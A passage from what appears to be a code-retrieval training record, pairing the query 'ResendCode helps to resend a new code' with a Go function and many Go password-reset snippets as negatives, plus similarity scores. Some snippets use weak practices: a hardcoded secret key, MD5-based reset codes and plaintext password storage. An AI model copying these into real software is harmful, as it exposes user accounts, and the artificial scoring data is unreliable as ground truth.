id)\n\tcheckErr(err)\n\n\treturn context.ValidateCredentials(username, newPassword)\n}", "func (userHandlersImpl UserHandlersImpl) ResendPassword(w http.ResponseWriter, req *http.Request) {\n\tctx := req.Context()\n\tvars := mux.Vars(req)\n\tid := vars[\"id\"]\n\tlog.Logger(ctx).Info(\"in request\")\n\n\terr := userHandlersImpl.userSvc.ResendPassword(ctx, id)\n\tif err != nil {\n\t\tWriteHTTPError(w, http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tresp := \"\"\n\tWriteOKResponse(w, resp)\n}", "func (env *Env) NewUserPassword(c *gin.Context) {\n\n\ttype newUserPasswordRequest struct {\n\t\tPassword string `json:\"password\"`\n\t}\n\n\t//decode request body\n\tjsonData, err := ioutil.ReadAll(c.Request.Body)\n\tif err != nil {\n\t\tLog.WithField(\"module\", \"handler\").WithError(err)\n\t\tc.AbortWithStatusJSON(http.StatusBadRequest, errs.RQST001)\n\t\treturn\n\t}\n\n\tvar request newUserPasswordRequest\n\terr = json.Unmarshal(jsonData, &request)\n\tif err != nil {\n\t\tLog.WithField(\"module\", \"handler\").WithError(err)\n\t\tc.AbortWithStatusJSON(http.StatusBadRequest, errs.RQST001)\n\t\treturn\n\t}\n\n\tvar user mysql.User\n\tuser.Username = c.Param(\"username\")\n\n\tvar exists int64\n\n\t//Check if Username exists in Database\n\tresult := env.db.Model(&user).Where(\"upper(username) = upper(?)\", user.Username).Count(&exists)\n\tif result.Error != nil {\n\t\tLog.WithField(\"module\", \"sql\").WithError(result.Error)\n\t\tc.AbortWithStatusJSON(http.StatusInternalServerError, errs.DBSQ001)\n\t\treturn\n\t}\n\n\tif exists == 0 {\n\t\tLog.WithField(\"module\", \"sql\").Error(\"Username not Found in Database\")\n\t\tc.AbortWithStatusJSON(http.StatusNotFound, errs.AUTH006)\n\t\treturn\n\t}\n\n\t//check if Password is reset\n\tresult = env.db.Where(\"upper(username) = upper(?) and password = ? and password_reset = ?\", user.Username, \"RESET\", true).First(&user)\n\tif result.Error != nil {\n\t\tif errors.Is(result.Error, gorm.ErrRecordNotFound) {\n\t\t\tLog.WithField(\"module\", \"handler\").Error(\"Username and ResetCode combination not found!\")\n\t\t\tc.AbortWithStatusJSON(http.StatusUnauthorized, errs.AUTH008)\n\t\t\treturn\n\t\t} else {\n\t\t\tLog.WithField(\"module\", \"sql\").WithError(result.Error)\n\t\t\tc.AbortWithStatusJSON(http.StatusInternalServerError, errs.DBSQ001)\n\t\t\treturn\n\t\t}\n\t}\n\n\t//Save new Password to Database\n\tuser.Password = request.Password\n\tuser.PasswordReset = false\n\tresult = env.db.Save(&user)\n\tif result.Error != nil {\n\t\tLog.WithField(\"module\", \"sql\").WithError(result.Error)\n\t\tc.AbortWithStatusJSON(http.StatusInternalServerError, errs.DBSQ005)\n\t\treturn\n\t}\n\n}", "func requestResetFormHandler(w http.ResponseWriter, r *http.Request) {\n\tdata := identity.RequestResetResult{\n\t\tEmailValid: true,\n\t\tRequestResetSuccess: false,\n\t\tShowNewForm: true,\n\t\tUser: identity.InvalidUser(),\n\t\tToken: \"\",\n\t}\n\ttitle := b.webConfig.GetVarWithDefault(\"Title\", defTitle)\n\tcontent := htmlContent{\n\t\tTitle: title,\n\t\tErrorMsg: \"\",\n\t\tTMResults: nil,\n\t\tData: data,\n\t}\n\tb.pageDisplayer.DisplayPage(w, \"request_reset_form.html\", content)\n}", "func (p *politeiawww) processChangePassword(email string, cp www.ChangePassword) (*www.ChangePasswordReply, error) {\n\tvar reply www.ChangePasswordReply\n\n\t// Get user from db.\n\tu, err := p.userByEmail(email)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Check the user's password.\n\terr = bcrypt.CompareHashAndPassword(u.HashedPassword,\n\t\t[]byte(cp.CurrentPassword))\n\tif err != nil {\n\t\treturn nil, www.UserError{\n\t\t\tErrorCode: www.ErrorStatusInvalidPassword,\n\t\t}\n\t}\n\n\t// Validate the new password.\n\terr = validatePassword(cp.NewPassword)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Hash the user's password.\n\thashedPassword, err := p.hashPassword(cp.NewPassword)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Add the updated user information to the db.\n\tu.HashedPassword = hashedPassword\n\terr = p.db.UserUpdate(*u)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\terr = p.emailUserPasswordChanged(email)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &reply, nil\n}", "func ForgetPassword(input *User) (*User, error) {\n\tuser := getUserByEmail(input.Email)\n\n\tif user == nil {\n\t\treturn nil, fmt.Errorf(\"Invalid email address.\")\n\t} else if user.ActivationCode != nil {\n\t\treturn nil, fmt.Errorf(\"Please activate your account first.\")\n\t}\n\n\t// Store the reset password code to the user\n\thash := md5.New()\n\thash.Write([]byte(fmt.Sprint(user.ID) + time.Now().String()))\n\tresetPasswordCode := hex.EncodeToString(hash.Sum(nil))\n\t// Add one hour to the expiry date for reseting the password\n\tresetPasswordExpiredAt := time.Now().Local().Add(time.Hour * 1)\n\n\tdb := getDB()\n\tdefer db.Close()\n\n\tdb.Model(&user).Update(map[string]interface{}{\n\t\t\"ResetPasswordCode\": resetPasswordCode,\n\t\t\"ResetPasswordExpiredAt\": resetPasswordExpiredAt,\n\t})\n\n\treturn user, nil\n}", "func receiverVerify (userInput ,digest string)bool{\n\tsecretKey := \"2ab9eb0\"\n\tplainText := secretKey+userInput\n\tdigest_local := Sha1(plainText)\n\tif strings.Compare(digest,digest_local)==0{\n\t\treturn true\n\t}\n\treturn false\n}", "func DoRecoverPassword(_ http.ResponseWriter, r *http.Request) {\n\tr.ParseForm()\n\n}", "func (db *MyConfigurations) showResetPasswordByEmailPage(c echo.Context) error {\n\tstatus, message := getFlashMessages(&c) // gets the flash message and status if there was any\n\temail := c.QueryParam(\"email\")\n\thash := c.QueryParam(\"hash\")\n\tvar otp models.OTP\n\tdb.GormDB.Table(\"otps\").First(&otp, \"email = ? AND verification_code = ?\", email, hash)\n\tif otp.UserID == 0 {\n\t\treturn redirectWithFlashMessage(\"failure\", \"حدث خطأ ما برجاء اعاده المحاوله مره اخرى (او قم بأرسال البريد الالكتروني مره اخرى)\", \"/login\", &c)\n\t}\n\tformAction := \"/email-reset-password?email=\" + email + \"&hash=\" + hash\n\treturn c.Render(http.StatusOK, \"reset-password-by-email.html\", echo.Map{\n\t\t\"status\": status, // pass the status of the flash message\n\t\t\"message\": message, // pass the message\n\t\t\"hideNavBar\": true, // boolean to indicate weather or not the NavBar should be displayed\n\t\t\"formAction\": formAction, // the URL that the form should be submitted to\n\t})\n}", "func (user User) SendRecoveryEmail() error {\n\n\tvar email Email\n\temail.Sender = Settings.MailerLogin\n\temail.Host = Settings.Hostname\n\temail.Recipient.ID = strconv.Itoa(int(user.ID))\n\temail.Recipient.Name = user.Name\n\temail.Recipient.Address = user.Email\n\temail.Recipient.RecoveryKey = user.Recovery\n\n\tfrom := mail.Address{\n\t\tName: Settings.Name,\n\t\tAddress: email.Sender,\n\t}\n\tto := mail.Address{\n\t\tName: email.Recipient.Name,\n\t\tAddress: email.Recipient.Address,\n\t}\n\ttitle := \"Password reset\"\n\n\tt, err := template.New(\"mail\").Parse(RecoveryTemplate)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tvar buf bytes.Buffer\n\terr = t.Execute(&buf, email)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\theader := make(map[string]string)\n\theader[\"From\"] = from.String()\n\theader[\"To\"] = to.String()\n\theader[\"Subject\"] = title\n\theader[\"MIME-Version\"] = \"1.0\"\n\theader[\"Content-Type\"] = \"text/plain; charset=\\\"utf-8\\\"\"\n\theader[\"Content-Transfer-Encoding\"] = \"base64\"\n\n\tvar message string\n\tfor k, v := range header {\n\t\tmessage += fmt.Sprintf(\"%s: %s\\r\\n\", k, v)\n\t}\n\tmessage += \"\\r\\n\" + base64.StdEncoding.EncodeToString(buf.Bytes())\n\n\tauth := smtp.PlainAuth(\n\t\t\"\",\n\t\tSettings.MailerLogin,\n\t\tSettings.MailerPassword,\n\t\tSettings.MailerHostname,\n\t)\n\n\terr = smtp.SendMail(\n\t\tfmt.Sprintf(\"%s:%d\", Settings.MailerHostname, Settings.MailerPort),\n\t\tauth,\n\t\tfrom.Address,\n\t\t[]string{to.Address},\n\t\t[]byte(message),\n\t)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func TriggerPasswordResetEmail(userRepo storage.UserRepo, user storage.User) error {\n\t// create 32 random bytes\n\ttoken := make([]byte, 32)\n\trand.Read(token)\n\n\tuserToken, err := createPasswordResetToken(userRepo, user, token)\n\n\tif err != nil {\n\t\tpanic(\"unable to create password reset token for user\")\n\t}\n\n\tpasswordResetToken := base64.StdEncoding.EncodeToString(token)\n\temail.SendPasswordResetEmail(userToken.SentTo.String, passwordResetToken)\n\n\treturn nil\n}", "func ResetPassword() echo.HandlerFunc {\n\treturn func(context echo.Context) error {\n\t\tnewPassword := context.FormValue(\"password\")\n\t\tvar email string\n\t\tvar ok bool\n\t\tif email, ok = context.Get(\"email\").(string); !ok {\n\t\t\tlog.Println(\"Missing email in password reset request\")\n\t\t\treturn context.JSON(http.StatusUnauthorized, errors.New(\"Missing email in password reset request\"))\n\t\t}\n\t\tuser, err := FindByEmail(email)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Cannot find user during password reset: %v\\n\", err)\n\t\t\treturn context.JSON(http.StatusUnauthorized, errors.New(\"Wrong email in password reset request\"))\n\t\t}\n\n\t\thash, bcryptErr := bcrypt.GenerateFromPassword([]byte(newPassword), bcrypt.DefaultCost)\n\t\tif bcryptErr != nil {\n\t\t\tlog.Println(bcryptErr)\n\t\t\treturn context.JSON(http.StatusInternalServerError, errors.New(\"Server error. The password was not changed.\"))\n\t\t}\n\n\t\tuser.Hash = string(hash)\n\t\terr = Save(user)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t\treturn context.JSON(http.StatusInternalServerError, errors.New(\"Server error. The password was not changed.\"))\n\t\t}\n\n\t\treturn context.JSON(http.StatusOK, nil)\n\t}\n}", "func (client JobClient) RenewKeySender(req *http.Request) (*http.Response, error) {\n return client.Send(req, azure.DoRetryWithRegistration(client.Client))\n }", "func (us *userService) InitiateResetPassowrd(email string) (string, error) {\n\tuser, err := us.Repo.GetByEmail(email)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\ttoken, err := us.Rds.GenerateToken()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\thashedToken := us.hmac.Hash(token)\n\n\tpwd := pwd.PasswordReset{\n\t\tUserID: user.ID,\n\t\tToken: hashedToken,\n\t}\n\n\terr = us.PwdRepo.Create(&pwd)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treturn token, nil\n}", "func (h *AuthHandlers) ChangePwd(w http.ResponseWriter, req *http.Request) {\n\tvar err error\n\tvar data []byte\n\n\tsystemContext, err := h.getSystemContext(req)\n\tif err != nil {\n\t\tlog.Error().Err(err).Msg(\"request context retrevial failure\")\n\t\tmiddleware.ReturnError(w, err.Error(), 500)\n\t\treturn\n\t}\n\n\tif data, err = ioutil.ReadAll(req.Body); err != nil {\n\t\tlog.Error().Err(err).Msg(\"read body error\")\n\t\tmiddleware.ReturnError(w, \"error reading changepwd data\", 500)\n\t\treturn\n\t}\n\tdefer req.Body.Close()\n\n\tloginDetails := &authz.LoginDetails{}\n\tif err := json.Unmarshal(data, loginDetails); err != nil {\n\t\tlog.Error().Err(err).Msg(\"marshal body error\")\n\t\tmiddleware.ReturnError(w, \"error reading changepwd data\", 500)\n\t\treturn\n\t}\n\tlog.Info().Str(\"org\", loginDetails.OrgName).Str(\"user\", loginDetails.Username).Msg(\"changepwd called\")\n\tif err := h.validate.Struct(loginDetails); err != nil {\n\t\tmiddleware.ReturnError(w, \"validation failure \"+err.Error(), 500)\n\t\treturn\n\t}\n\n\tloginDetails.OrgName = strings.ToLower(loginDetails.OrgName)\n\tloginDetails.Username = strings.ToLower(loginDetails.Username)\n\n\torgData, err := h.getOrgByName(req.Context(), systemContext, loginDetails.OrgName)\n\tif err != nil {\n\t\tlog.Error().Err(err).Str(\"org\", loginDetails.OrgName).Str(\"user\", loginDetails.Username).Msg(\"failed to get organization from name\")\n\t\tmiddleware.ReturnError(w, \"forgot password confirm failed\", 403)\n\t\treturn\n\t}\n\n\tif _, err := h.authenticator.SetNewPassword(req.Context(), orgData, loginDetails); err != nil {\n\t\tlog.Error().Err(err).Str(\"org\", loginDetails.OrgName).Str(\"user\", loginDetails.Username).Msg(\"set new password failed\")\n\t\tmiddleware.ReturnError(w, \"set new password failed\", 403)\n\t\treturn\n\t}\n\n\tresp := make(map[string]string, 0)\n\tresp[\"status\"] = \"ok\"\n\n\trespData, _ := json.Marshal(resp)\n\tw.WriteHeader(200)\n\tfmt.Fprint(w, string(respData))\n}", "func (a *API) Recover(w http.ResponseWriter, r *http.Request) error {\n\tctx := r.Context()\n\tconfig := a.getConfig(ctx)\n\tinstanceID := getInstanceID(ctx)\n\tparams := &RecoverParams{}\n\tjsonDecoder := json.NewDecoder(r.Body)\n\terr := jsonDecoder.Decode(params)\n\tif err != nil {\n\t\treturn badRequestError(\"Could not read verification params: %v\", err)\n\t}\n\n\tif params.Email == \"\" {\n\t\treturn unprocessableEntityError(\"Password recovery requires an email\")\n\t}\n\n\taud := a.requestAud(ctx, r)\n\tuser, err := models.FindUserByEmailAndAudience(a.db, instanceID, params.Email, aud)\n\tif err != nil {\n\t\tif models.IsNotFoundError(err) {\n\t\t\treturn notFoundError(err.Error())\n\t\t}\n\t\treturn internalServerError(\"Database error finding user\").WithInternalError(err)\n\t}\n\n\terr = a.db.Transaction(func(tx *storage.Connection) error {\n\t\tif terr := models.NewAuditLogEntry(tx, instanceID, user, models.UserRecoveryRequestedAction, nil); terr != nil {\n\t\t\treturn terr\n\t\t}\n\n\t\tmailer := a.Mailer(ctx)\n\t\treferrer := a.getReferrer(r)\n\t\treturn a.sendPasswordRecovery(tx, user, mailer, config.SMTP.MaxFrequency, referrer)\n\t})\n\tif err != nil {\n\t\treturn internalServerError(\"Error recovering user\").WithInternalError(err)\n\t}\n\n\treturn sendJSON(w, http.StatusOK, &map[string]string{})\n}", "func (a *Admin) ResetPassword(newPassword string) error {\n\tall := a.Connections().GetAll()\n\tif len(all) == 0 {\n\t\treturn fmt.Errorf(\"no connection for other redis-node found\")\n\t}\n\tfor addr, c := range a.Connections().GetAll() {\n\t\ta.log.Info(\"reset password\", \"addr\", addr)\n\t\tsetMasterauth := c.Cmd(\"CONFIG\", \"SET\", \"masterauth\", newPassword)\n\t\tif err := a.Connections().ValidateResp(setMasterauth, addr, \"cannot set new masterauth\"); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tsetPasswdResp := c.Cmd(\"CONFIG\", \"SET\", \"requirepass\", newPassword)\n\t\tif err := a.Connections().ValidateResp(setPasswdResp, addr, \"cannot set new requirepass\"); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func (m *UserResource) ForgotPasswordSetNewPassword(ctx context.Context, userId string, body UserCredentials, qp *query.Params) (*ForgotPasswordResponse, *Response, error) {\n\turl := fmt.Sprintf(\"/api/v1/users/%v/credentials/forgot_password\", userId)\n\tif qp != nil {\n\t\turl = url + qp.String()\n\t}\n\n\trq := m.client.CloneRequestExecutor()\n\n\treq, err := rq.WithAccept(\"application/json\").WithContentType(\"application/json\").NewRequest(\"POST\", url, body)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar forgotPasswordResponse *ForgotPasswordResponse\n\n\tresp, err := rq.Do(ctx, req, &forgotPasswordResponse)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn forgotPasswordResponse, resp, nil\n}", "func TestPasswordNeedsRehash(t *testing.T) {\n\tpw := make([]byte, 12)\n\tfor i := 0; i < 32; i++ {\n\t\tgrand.Read(pw)\n\t\thash, _ := bcrypt.GenerateFromPassword(pw, cost-1)\n\t\tif !PasswordNeedsRehash(hash) {\n\t\t\tt.Errorf(\"PasswordNeedsRehash returned false, expected true\")\n\t\t\tt.FailNow()\n\t\t}\n\t}\n\tfor i := 0; i < 32; i++ {\n\t\tgrand.Read(pw)\n\t\thash, _ := bcrypt.GenerateFromPassword(pw, cost)\n\t\tif PasswordNeedsRehash(hash) {\n\t\t\tt.Errorf(\"PasswordNeedsRehash returned true, expected false\")\n\t\t}\n\t}\n}", "func (m *ManagedDeviceItemRequestBuilder) ResetPasscode()(*i15a1a10a0c024f930afef3b930ac6a0a48505b8f50dc765c9208ba2816bfb8fb.ResetPasscodeRequestBuilder) {\n return i15a1a10a0c024f930afef3b930ac6a0a48505b8f50dc765c9208ba2816bfb8fb.NewResetPasscodeRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func (c *RegistrationController) SetPassword(w http.ResponseWriter, r *http.Request) {\n\n\t// parse the JSON coming from the client\n\tvar passRequest passwordRequest\n\tdecoder := json.NewDecoder(r.Body)\n\n\t// check if the parsing succeeded\n\tif err := decoder.Decode(&passRequest); err != nil {\n\t\tlog.Println(err)\n\t\tc.Error500(w, err, \"Error parsing form values failed\")\n\t\treturn\n\t}\n\n\tif err := passwordsAreValid(passRequest.Password, passRequest.PasswordConfirmation); err != nil {\n\t\tlog.Println(err)\n\t\tc.Error500(w, err, \"Password invalid\")\n\t\treturn\n\t}\n\n\t//validate link\n\tuser, err := models.FindUserByVerificationUUID(passRequest.UUID)\n\n\tif err != nil {\n\t\tlog.Printf(\"Error setting password: %v is not a valid UUID\", passRequest.UUID)\n\t\tc.BadRequest(w, nil, \"Error verifying email address: %v is not a valid user identifier\", passRequest.UUID)\n\t\treturn\n\t}\n\n\tif !user.PasswordInvalid {\n\t\tc.Error500(w, nil, \"Password is already set\")\n\t\treturn\n\t}\n\n\tif err := user.UpdatePassword(passRequest.Password); err != nil {\n\t\tlog.Printf(\"Error updating the password in the database: %v\", err)\n\t\tc.Error500(w, err, \"Error updating the password in the database\")\n\t\treturn\n\t}\n\n\tc.Plain(\"\", w, r)\n\treturn\n}" ]
[ "0.7171423", "0.71607596", "0.7140673", "0.68705434", "0.6823032", "0.654389", "0.65227264", "0.65004206", "0.6471425", "0.6269772", "0.6252708", "0.62453693", "0.6240722", "0.6219106", "0.6211322", "0.6209083", "0.6203456", "0.6166167", "0.6163382", "0.6157834", "0.6134311", "0.6096276", "0.6042392", "0.6020306", "0.6017069", "0.6007372", "0.59832627", "0.59813464", "0.59280837", "0.58940434", "0.58899885", "0.58833593", "0.588151", "0.58541715", "0.58431554", "0.58407533", "0.5837528", "0.5834862", "0.5829892", "0.5820468", "0.5813016", "0.5791817", "0.57812315", "0.57808113", "0.578077", "0.5742991", "0.5692619", "0.5665664", "0.5640522", "0.55949175", "0.55919033", "0.55568177", "0.5544223", "0.55279505", "0.55214036", "0.55101603", "0.55099887", "0.55080646", "0.548097", "0.5470036", "0.54609454", "0.54380655", "0.5434596", "0.5418175", "0.53995717", "0.5392419", "0.53774434", "0.53638446", "0.5351381", "0.53424674", "0.53387696", "0.5331247", "0.53232616", "0.5300352", "0.52840775", "0.5257294", "0.52543527", "0.52327627", "0.52092284", "0.5179195", "0.51704013", "0.51642466", "0.5154697", "0.5149695", "0.5149693", "0.5149141", "0.5143805", "0.51397544", "0.51395285", "0.51248723", "0.51179016", "0.5110238", "0.5107284", "0.5103806", "0.50978124", "0.50919086", "0.50840133", "0.5082239", "0.5074664", "0.5059196" ]
0.69016
3
ResendCode helps to resend a new code
func (orm *ORM) ResendCode(ctx context.Context, adminID string) (*models.Admin, error) { var _Admin models.Admin // check if admin exists err := orm.DB.DB.First(&_Admin, "id = ?", adminID).Error if errors.Is(err, gorm.ErrRecordNotFound) { return nil, errors.New("AdminNotFound") } //generate code code := generatecode.GenerateCode(6) //save in redis and expire in an hours time redisErr := orm.rdb.Set(ctx, fmt.Sprintf("%s", _Admin.ID), code, 1*time.Hour).Err() if redisErr != nil { return nil, redisErr } // send code to email mailErr := mail.SendMail(_Admin.Email, fmt.Sprintf("Your code is %s", code)) if mailErr != nil { return nil, mailErr } return &_Admin, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (dc *DexClient) ResendActivationCode(email string) error {\n\treturn dc.ResendActivationCodeContext(context.Background(), email)\n}", "func (dc *DexClient) ResendActivationCodeContext(ctx context.Context, email string) error {\n\t// Create request body\n\treq := map[string]string{\n\t\t\"email\": email,\n\t}\n\trBytes, err := json.Marshal(&req)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn dc.responseOp(ctx, http.MethodPost, ResendActivationCodePath, bytes.NewBuffer(rBytes), nil)\n}", "func (c *Client) ResendEmailAddressVerificationCode(ctx context.Context) (*EmailAddressAuthenticationCodeInfo, error) {\n\tvar result EmailAddressAuthenticationCodeInfo\n\n\trequest := &ResendEmailAddressVerificationCodeRequest{}\n\tif err := c.rpc.Invoke(ctx, request, &result); err != nil {\n\t\treturn nil, err\n\t}\n\treturn &result, nil\n}", "func (ctr *RegistRequestController) ResendEmailRegister(c echo.Context) error {\n\tresendEmailParams := new(param.ResendEmailParams)\n\n\tif err := c.Bind(resendEmailParams); err != nil {\n\t\tmsgErrBind := err.Error()\n\t\tfieldErr := utils.GetFieldBindForm(msgErrBind)\n\n\t\tif fieldErr != \"\" {\n\t\t\treturn c.JSON(http.StatusOK, cf.JsonResponse{\n\t\t\t\tStatus: cf.FailResponseCode,\n\t\t\t\tMessage: \"Invalid field \" + fieldErr,\n\t\t\t})\n\t\t}\n\t}\n\n\trequestObj, err := ctr.RegistRequestRepo.GetRegRequestsByID(resendEmailParams.RequestID)\n\tif err != nil {\n\t\tif err.Error() == pg.ErrNoRows.Error() {\n\t\t\treturn c.JSON(http.StatusOK, cf.JsonResponse{\n\t\t\t\tStatus: cf.FailResponseCode,\n\t\t\t\tMessage: \"Request is not exists\",\n\t\t\t})\n\t\t}\n\n\t\treturn c.JSON(http.StatusInternalServerError, cf.JsonResponse{\n\t\t\tStatus: cf.FailResponseCode,\n\t\t\tMessage: \"System error\",\n\t\t})\n\t}\n\n\tnewestRegistCode, err := ctr.RegCodeRepo.GetNewRegistCodeByRequestID(resendEmailParams.RequestID)\n\tif err != nil {\n\t\tif err.Error() != pg.ErrNoRows.Error() {\n\t\t\treturn c.JSON(http.StatusInternalServerError, cf.JsonResponse{\n\t\t\t\tStatus: cf.FailResponseCode,\n\t\t\t\tMessage: \"System error\",\n\t\t\t})\n\t\t}\n\t}\n\n\tif !newestRegistCode.ExpiredAt.IsZero() && newestRegistCode.ExpiredAt.After(utils.TimeNowUTC()) {\n\t\treturn c.JSON(http.StatusInternalServerError, cf.JsonResponse{\n\t\t\tStatus: cf.FailResponseCode,\n\t\t\tMessage: \"The register code is not expired yet, please check your email and spam mail\",\n\t\t})\n\t}\n\n\tresendEmailParams.Email = requestObj.Email\n\tregCodeObj, err := ctr.RegistRequestRepo.GetResendRegistCode(ctr.RegCodeRepo, resendEmailParams)\n\n\tif err != nil {\n\t\treturn c.JSON(http.StatusInternalServerError, cf.JsonResponse{\n\t\t\tStatus: cf.FailResponseCode,\n\t\t\tMessage: \"System error\",\n\t\t})\n\t}\n\n\tuserProfile := c.Get(\"user_profile\").(m.User)\n\torg, err := ctr.OrgRepo.SelectEmailAndPassword(userProfile.OrganizationID)\n\tif err != nil {\n\t\treturn c.JSON(http.StatusInternalServerError, cf.JsonResponse{\n\t\t\tStatus: cf.FailResponseCode,\n\t\t\tMessage: \"System error\",\n\t\t})\n\t}\n\tif org.Email == \"\" || org.EmailPassword == \"\" {\n\t\treturn c.JSON(http.StatusUnprocessableEntity, cf.JsonResponse{\n\t\t\tStatus: cf.FailResponseCode,\n\t\t\tMessage: \"Your organization must have an email\",\n\t\t})\n\t}\n\n\tctr.InitSmtp(org.Email, org.EmailPassword)\n\n\tsampleData := new(param.SampleData)\n\tsampleData.SendTo = []string{regCodeObj.Email}\n\tsampleData.URL = os.Getenv(\"BASE_SPA_URL\") + \"/organization/create-organization/\" + regCodeObj.Code\n\tif err := ctr.SendMail(\"Micro Erp Registration Email\", sampleData, cf.CreateOrganizationTemplate); err != nil {\n\t\tctr.Logger.Error(err)\n\t\treturn c.JSON(http.StatusInternalServerError, cf.JsonResponse{\n\t\t\tStatus: cf.FailResponseCode,\n\t\t\tMessage: \"System error\",\n\t\t})\n\t}\n\n\treturn c.JSON(http.StatusOK, cf.JsonResponse{\n\t\tStatus: cf.SuccessResponseCode,\n\t\tMessage: \"Success\",\n\t})\n}", "func (v *Verifier) SatisfyCode(code string, kittyID string) error {\n\tif !v.Enabled {\n\t\treturn nil\n\t}\n\n\tsatisfyRequest, err := json.Marshal(SatisfyRequest{\n\t\tcode,\n\t\tkittyID,\n\t})\n\tif err != nil {\n\t\tv.log.WithError(err).Error(\"unable to marshal satisfy request\")\n\t\treturn err\n\t}\n\n\t// make a satisfy request to verification service\n\tresp, err := v.client.Post(\"/api/satisfy_code\",\n\t\t\"application/json\", bytes.NewBuffer(satisfyRequest))\n\tif err != nil {\n\t\tv.log.WithError(err).Error(\"failed to verify reservation code\")\n\t\treturn err\n\t}\n\n\tswitch resp.StatusCode {\n\tcase http.StatusNoContent:\n\t\tbreak\n\tcase http.StatusRequestTimeout:\n\t\treturn ErrSatisfyRequestTimeOut\n\tdefault:\n\t\treturn ErrSatisfyFailed\n\t}\n\n\treturn nil\n}", "func (service AccountsService) Reopen(code string) (*Response, error) {\n\taction := fmt.Sprintf(\"accounts/%s/reopen\", code)\n\treq, err := service.client.newRequest(\"PUT\", action, nil, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn service.client.do(req, nil)\n}", "func (c *SeaterController) Code(code int) {\n\tc.Ctx.Output.SetStatus(code)\n}", "func (p *Persister) UseRecoveryCode(ctx context.Context, fID uuid.UUID, codeVal string) (*code.RecoveryCode, error) {\n\tctx, span := p.r.Tracer(ctx).Tracer().Start(ctx, \"persistence.sql.UseRecoveryCode\")\n\tdefer span.End()\n\n\tvar recoveryCode *code.RecoveryCode\n\n\tnid := p.NetworkID(ctx)\n\n\tflowTableName := new(recovery.Flow).TableName(ctx)\n\n\tif err := sqlcon.HandleError(p.Transaction(ctx, func(ctx context.Context, tx *pop.Connection) (err error) {\n\n\t\t//#nosec G201 -- TableName is static\n\t\tif err := sqlcon.HandleError(tx.RawQuery(fmt.Sprintf(\"UPDATE %s SET submit_count = submit_count + 1 WHERE id = ? AND nid = ?\", flowTableName), fID, nid).Exec()); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tvar submitCount int\n\t\t// Because MySQL does not support \"RETURNING\" clauses, but we need the updated `submit_count` later on.\n\t\t//#nosec G201 -- TableName is static\n\t\tif err := sqlcon.HandleError(tx.RawQuery(fmt.Sprintf(\"SELECT submit_count FROM %s WHERE id = ? AND nid = ?\", flowTableName), fID, nid).First(&submitCount)); err != nil {\n\t\t\tif errors.Is(err, sqlcon.ErrNoRows) {\n\t\t\t\t// Return no error, as that would roll back the transaction\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\treturn err\n\t\t}\n\n\t\t// This check prevents parallel brute force attacks to generate the recovery code\n\t\t// by checking the submit count inside this database transaction.\n\t\t// If the flow has been submitted more than 5 times, the transaction is aborted (regardless of whether the code was correct or not)\n\t\t// and we thus give no indication whether the supplied code was correct or not. See also https://github.com/ory/kratos/pull/2645#discussion_r984732899\n\t\tif submitCount > 5 {\n\t\t\treturn errors.WithStack(code.ErrCodeSubmittedTooOften)\n\t\t}\n\n\t\tvar recoveryCodes []code.RecoveryCode\n\t\tif err = sqlcon.HandleError(tx.Where(\"nid = ? AND selfservice_recovery_flow_id = ?\", nid, fID).All(&recoveryCodes)); err != nil {\n\t\t\tif errors.Is(err, sqlcon.ErrNoRows) {\n\t\t\t\t// Return no error, as that would roll back the transaction\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\treturn err\n\t\t}\n\n\tsecrets:\n\t\tfor _, secret := range p.r.Config().SecretsSession(ctx) {\n\t\t\tsuppliedCode := []byte(p.hmacValueWithSecret(ctx, codeVal, secret))\n\t\t\tfor i := range recoveryCodes {\n\t\t\t\tcode := recoveryCodes[i]\n\t\t\t\tif subtle.ConstantTimeCompare([]byte(code.CodeHMAC), suppliedCode) == 0 {\n\t\t\t\t\t// Not the supplied code\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\trecoveryCode = &code\n\t\t\t\tbreak secrets\n\t\t\t}\n\t\t}\n\n\t\tif recoveryCode == nil || !recoveryCode.IsValid() {\n\t\t\t// Return no error, as that would roll back the transaction\n\t\t\treturn nil\n\t\t}\n\n\t\tvar ra identity.RecoveryAddress\n\t\tif err := tx.Where(\"id = ? AND nid = ?\", recoveryCode.RecoveryAddressID, nid).First(&ra); err != nil {\n\t\t\tif err = sqlcon.HandleError(err); !errors.Is(err, sqlcon.ErrNoRows) {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t\trecoveryCode.RecoveryAddress = &ra\n\n\t\t//#nosec G201 -- TableName is static\n\t\treturn sqlcon.HandleError(tx.RawQuery(fmt.Sprintf(\"UPDATE %s SET used_at = ? WHERE id = ? AND nid = ?\", recoveryCode.TableName(ctx)), time.Now().UTC(), recoveryCode.ID, nid).Exec())\n\t})); err != nil {\n\t\treturn nil, err\n\t}\n\n\tif recoveryCode == nil {\n\t\treturn nil, code.ErrCodeNotFound\n\t}\n\n\tif recoveryCode.IsExpired() {\n\t\treturn nil, flow.NewFlowExpiredError(recoveryCode.ExpiresAt)\n\t}\n\n\tif recoveryCode.WasUsed() 